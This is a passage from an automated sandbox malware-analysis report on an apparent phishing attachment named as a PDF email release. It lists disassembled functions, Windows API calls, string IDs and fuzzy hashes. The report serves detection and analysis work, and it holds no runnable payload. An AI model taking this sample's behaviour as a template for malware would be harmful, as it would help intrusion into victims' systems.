                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                                                          • String ID:
                                                                                                          • API String ID: 3902887630-0
                                                                                                          • Opcode ID: 8a5e9a9692b17d0d42e58cec4d85692802dd40d8231081bd5d55f9fe83d46466
                                                                                                          • Instruction ID: f3ce67dc8c961623017327c6e644b39ef95d1124dbfe450118f3f653628c5d6e
                                                                                                          • Opcode Fuzzy Hash: 8a5e9a9692b17d0d42e58cec4d85692802dd40d8231081bd5d55f9fe83d46466
                                                                                                          • Instruction Fuzzy Hash: 0321CB71205204BAEB155B759C49F7F7BA8EF86750F00813EF809D9192EB69DC419690
                                                                                                          Function 007DB14B Relevance: 7.6, APIs: 5, Instructions: 85COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00752612: GetWindowLongW.USER32(?,000000EB), ref: 00752623
                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 007DB192
                                                                                                          • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 007DB1B7
                                                                                                          • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 007DB1CF
                                                                                                          • GetSystemMetrics.USER32(00000004), ref: 007DB1F8
                                                                                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,007C0E90,00000000), ref: 007DB216
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$Long$MetricsSystem
                                                                                                          • String ID:
                                                                                                          • API String ID: 2294984445-0
                                                                                                          • Opcode ID: 85270c415a424cfb5e45690e2ba7bde29ea146a69c2ea34b5bfa84874d049666
                                                                                                          • Instruction ID: c21198af24b5283cb25f5751c9f4857b4de6ec18330bcbebd27e554b678b0f5d
                                                                                                          • Opcode Fuzzy Hash: 85270c415a424cfb5e45690e2ba7bde29ea146a69c2ea34b5bfa84874d049666
                                                                                                          • Instruction Fuzzy Hash: BD219F72A10655EFCB109F38DC44A6A3BB4FB05361F16873AF932D72E0E73598208B90
                                                                                                          Function 007A9307 Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 007A9320
                                                                                                            • Part of subcall function 00757BCC: _memmove.LIBCMT ref: 00757C06
                                                                                                          • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 007A9352
                                                                                                          • __itow.LIBCMT ref: 007A936A
                                                                                                          • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 007A9392
                                                                                                          • __itow.LIBCMT ref: 007A93A3
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$__itow$_memmove
                                                                                                          • String ID:
                                                                                                          • API String ID: 2983881199-0
                                                                                                          • Opcode ID: bbc2bf50d047e0745a199f6d65df13c43971609c1746f968eb2ec8e27235d532
                                                                                                          • Instruction ID: 6579e4fd8abe90258f8f7c9fd7ceab0ea61e600ebe33f7dd96fa45c2215c0a6c
                                                                                                          • Opcode Fuzzy Hash: bbc2bf50d047e0745a199f6d65df13c43971609c1746f968eb2ec8e27235d532
                                                                                                          • Instruction Fuzzy Hash: 8E210A31701204EBDF109A609C89EEE7BBCEB8A711F048025FE05D71C0D6B8CD559791
                                                                                                          Function 007C5A4D Relevance: 7.6, APIs: 5, Instructions: 70COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • IsWindow.USER32(00000000), ref: 007C5A6E
                                                                                                          • GetForegroundWindow.USER32 ref: 007C5A85
                                                                                                          • GetDC.USER32(00000000), ref: 007C5AC1
                                                                                                          • GetPixel.GDI32(00000000,?,00000003), ref: 007C5ACD
                                                                                                          • ReleaseDC.USER32(00000000,00000003), ref: 007C5B08
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$ForegroundPixelRelease
                                                                                                          • String ID:
                                                                                                          • API String ID: 4156661090-0
                                                                                                          • Opcode ID: 74d4b5fd75fd352008dcb2a58461d5799f3a9a357d78b4382bb1264a3cb34cb1
                                                                                                          • Instruction ID: 6041757b90674482cd7c25600aa932226b720b92ff31cc63d6c10f60af4c395b
                                                                                                          • Opcode Fuzzy Hash: 74d4b5fd75fd352008dcb2a58461d5799f3a9a357d78b4382bb1264a3cb34cb1
                                                                                                          • Instruction Fuzzy Hash: 4B218075A01104EFD700EF65DC88A9ABBF5EF48310F14C07DE80A97752CA78AD41CB50
                                                                                                          Function 007512F3 Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0075134D
                                                                                                          • SelectObject.GDI32(?,00000000), ref: 0075135C
                                                                                                          • BeginPath.GDI32(?), ref: 00751373
                                                                                                          • SelectObject.GDI32(?,00000000), ref: 0075139C
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ObjectSelect$BeginCreatePath
                                                                                                          • String ID:
                                                                                                          • API String ID: 3225163088-0
                                                                                                          • Opcode ID: f17b0a98cac0bc126968a0feb2c3da34e5d894ea0d61a8c4202c8d07af5e4ddc
                                                                                                          • Instruction ID: 12664f8dc6f5c25664ab49c3accd91653164abb3d83cec897277d802cd16f822
                                                                                                          • Opcode Fuzzy Hash: f17b0a98cac0bc126968a0feb2c3da34e5d894ea0d61a8c4202c8d07af5e4ddc
                                                                                                          • Instruction Fuzzy Hash: E9213D30801608EFDB119F29EC487EA7BB9FB40723F58C226F811965B0D7B99995DF90
                                                                                                          Function 007B4A93 Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 007B4ABA
                                                                                                          • __beginthreadex.LIBCMT ref: 007B4AD8
                                                                                                          • MessageBoxW.USER32(?,?,?,?), ref: 007B4AED
                                                                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 007B4B03
                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 007B4B0A
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                                                                          • String ID:
                                                                                                          • API String ID: 3824534824-0
                                                                                                          • Opcode ID: a7fb3c266add57748b737d971c2d52c96b9b2c686fe3fa699553756c138329a5
                                                                                                          • Instruction ID: 78b65ba9d4b9b839d8d789ddd8c85dc2c14511e3e076d4969ef97a06b28ffc77
                                                                                                          • Opcode Fuzzy Hash: a7fb3c266add57748b737d971c2d52c96b9b2c686fe3fa699553756c138329a5
                                                                                                          • Instruction Fuzzy Hash: 621108B6905248FFCB009FA89C08BDB7FBCEF85320F188266F915D3251D679C90087A0
                                                                                                          Function 007A8202 Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 007A821E
                                                                                                          • GetLastError.KERNEL32(?,007A7CE2,?,?,?), ref: 007A8228
                                                                                                          • GetProcessHeap.KERNEL32(00000008,?,?,007A7CE2,?,?,?), ref: 007A8237
                                                                                                          • HeapAlloc.KERNEL32(00000000,?,007A7CE2,?,?,?), ref: 007A823E
                                                                                                          • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 007A8255
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                                          • String ID:
                                                                                                          • API String ID: 842720411-0
                                                                                                          • Opcode ID: b1b23c8b84d4aabcd2372918aa69ffd44ebc693a37a32c2e204188b90ab6fbfd
                                                                                                          • Instruction ID: 3597f07d47fdbb47d564ffbcb60ee91255dd3154c1cf913c1e781943bbea676d
                                                                                                          • Opcode Fuzzy Hash: b1b23c8b84d4aabcd2372918aa69ffd44ebc693a37a32c2e204188b90ab6fbfd
                                                                                                          • Instruction Fuzzy Hash: 9F016D71201208FFDB204FA5DC48D6B7FBCFF8A754B50453AF84AC2260DA368D00CA61
                                                                                                          Function 007A710A Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,007A7044,80070057,?,?,?,007A7455), ref: 007A7127
                                                                                                          • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,007A7044,80070057,?,?), ref: 007A7142
                                                                                                          • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,007A7044,80070057,?,?), ref: 007A7150
                                                                                                          • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,007A7044,80070057,?), ref: 007A7160
                                                                                                          • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,007A7044,80070057,?,?), ref: 007A716C
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                          • String ID:
                                                                                                          • API String ID: 3897988419-0
                                                                                                          • Opcode ID: 8e2733e7d3bfbba8d71c29c832468dfc3680dcc81aae59badff29f10facab42e
                                                                                                          • Instruction ID: eedfbad24249c9c6a9a91d767f3a41899ecc529e60420d5b5dcf451989763d74
                                                                                                          • Opcode Fuzzy Hash: 8e2733e7d3bfbba8d71c29c832468dfc3680dcc81aae59badff29f10facab42e
                                                                                                          • Instruction Fuzzy Hash: 8A017C72602208ABDB154F64DC44AAA7BFDEB857A1F148265FD05D6220D739DD40EBA0
                                                                                                          Function 007B5244 Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 007B5260
                                                                                                          • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 007B526E
                                                                                                          • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 007B5276
                                                                                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 007B5280
                                                                                                          • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 007B52BC
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                          • String ID:
                                                                                                          • API String ID: 2833360925-0
                                                                                                          • Opcode ID: 224105c969dd5aa1f4d3912ef84ab103718ee1f544a288f9dbd73b13fa14e178
                                                                                                          • Instruction ID: 6d2335cc48a15e2b18c6306372976439dd1632aed4d15b1b9998eb0f3a497af8
                                                                                                          • Opcode Fuzzy Hash: 224105c969dd5aa1f4d3912ef84ab103718ee1f544a288f9dbd73b13fa14e178
                                                                                                          • Instruction Fuzzy Hash: F3015771D02A1DDBCF00EFE8E848BEDBB78FB0D311F404056E942B2240CB39595087A5
                                                                                                          Function 007A810A Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 007A8121
                                                                                                          • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 007A812B
                                                                                                          • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 007A813A
                                                                                                          • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 007A8141
                                                                                                          • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 007A8157
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                          • String ID:
                                                                                                          • API String ID: 44706859-0
                                                                                                          • Opcode ID: 5d4b9ec31aa8de7e9cceaf0f29e765d6a06d51787b357b5ca3da98e85298f33c
                                                                                                          • Instruction ID: 3d734d3de04cbb223e6eea0dbc497c9e497c5e76f2bbd3af3caf2a18907ec0b5
                                                                                                          • Opcode Fuzzy Hash: 5d4b9ec31aa8de7e9cceaf0f29e765d6a06d51787b357b5ca3da98e85298f33c
                                                                                                          • Instruction Fuzzy Hash: E9F06271301308AFEB511FA5EC88E673BBCFF8A754B04413AF986C7150DB699D41DA62
                                                                                                          Function 007AC1E3 Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 007AC1F7
                                                                                                          • GetWindowTextW.USER32(00000000,?,00000100), ref: 007AC20E
                                                                                                          • MessageBeep.USER32(00000000), ref: 007AC226
                                                                                                          • KillTimer.USER32(?,0000040A), ref: 007AC242
                                                                                                          • EndDialog.USER32(?,00000001), ref: 007AC25C
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 3741023627-0
                                                                                                          • Opcode ID: 313d90c0a876ecbc2273eace784d0ecf91aee01981d03d223760070c7bb9649e
                                                                                                          • Instruction ID: b8ae14d5e98134caefba39a9037c908dcb6e08fb8309516b0a9c06798ecec65a
                                                                                                          • Opcode Fuzzy Hash: 313d90c0a876ecbc2273eace784d0ecf91aee01981d03d223760070c7bb9649e
                                                                                                          • Instruction Fuzzy Hash: E601A230404704ABEB215B60ED4EB9677B8FB01B06F00426AE553A14E0DBE8A9448B94
                                                                                                          Function 007513B0 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • EndPath.GDI32(?), ref: 007513BF
                                                                                                          • StrokeAndFillPath.GDI32(?,?,0078B888,00000000,?), ref: 007513DB
                                                                                                          • SelectObject.GDI32(?,00000000), ref: 007513EE
                                                                                                          • DeleteObject.GDI32 ref: 00751401
                                                                                                          • StrokePath.GDI32(?), ref: 0075141C
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                                          • String ID:
                                                                                                          • API String ID: 2625713937-0
                                                                                                          • Opcode ID: 11c96d911156a2171c67170845fdc6494b65722903149a61f5eaa28c034b69d2
                                                                                                          • Instruction ID: e6d160428d5a411e585dc1521421c28d5df7c99458de8c27c9246807a9b31c8a
                                                                                                          • Opcode Fuzzy Hash: 11c96d911156a2171c67170845fdc6494b65722903149a61f5eaa28c034b69d2
                                                                                                          • Instruction Fuzzy Hash: E4F0C430005A48EBDB115F2AEC4C7993BB9BB41327F58C236E82A894F1C7798999DF54
                                                                                                          Function 007BC397 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • CoInitialize.OLE32(00000000), ref: 007BC432
                                                                                                          • CoCreateInstance.OLE32(007E2D6C,00000000,00000001,007E2BDC,?), ref: 007BC44A
                                                                                                            • Part of subcall function 00757DE1: _memmove.LIBCMT ref: 00757E22
                                                                                                          • CoUninitialize.OLE32 ref: 007BC6B7
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateInitializeInstanceUninitialize_memmove
                                                                                                          • String ID: .lnk
                                                                                                          • API String ID: 2683427295-24824748
                                                                                                          • Opcode ID: 1bda8dbccf7256d2aa01c396ed48b3cf37b31d1360702cd0b44820da3968e7be
                                                                                                          • Instruction ID: 5acc9250eb3430db6a5373f43d8d4bdc14ea7619b9f725b873ed2653c1e78dee
                                                                                                          • Opcode Fuzzy Hash: 1bda8dbccf7256d2aa01c396ed48b3cf37b31d1360702cd0b44820da3968e7be
                                                                                                          • Instruction Fuzzy Hash: 87A14AB1204305EFD300EF54C885EABB7E8FF89315F00491DF5559B1A2DBB5AA09CB62
                                                                                                          Function 00762CFB Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00770DB6: std::exception::exception.LIBCMT ref: 00770DEC
                                                                                                            • Part of subcall function 00770DB6: __CxxThrowException@8.LIBCMT ref: 00770E01
                                                                                                            • Part of subcall function 00757DE1: _memmove.LIBCMT ref: 00757E22
                                                                                                            • Part of subcall function 00757A51: _memmove.LIBCMT ref: 00757AAB
                                                                                                          • __swprintf.LIBCMT ref: 00762ECD
                                                                                                          Strings
                                                                                                          • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00762D66
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                                                                          • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                                          • API String ID: 1943609520-557222456
                                                                                                          • Opcode ID: 1331ef6ec5fcaf8a2aff4c8af308612db0a172e10ac8373c3bdf435ae69db26e
                                                                                                          • Instruction ID: 1f190fb8e86c80d1f9d0aa9b3c50d7a3ba683901f5495feccf759b5297c25c27
                                                                                                          • Opcode Fuzzy Hash: 1331ef6ec5fcaf8a2aff4c8af308612db0a172e10ac8373c3bdf435ae69db26e
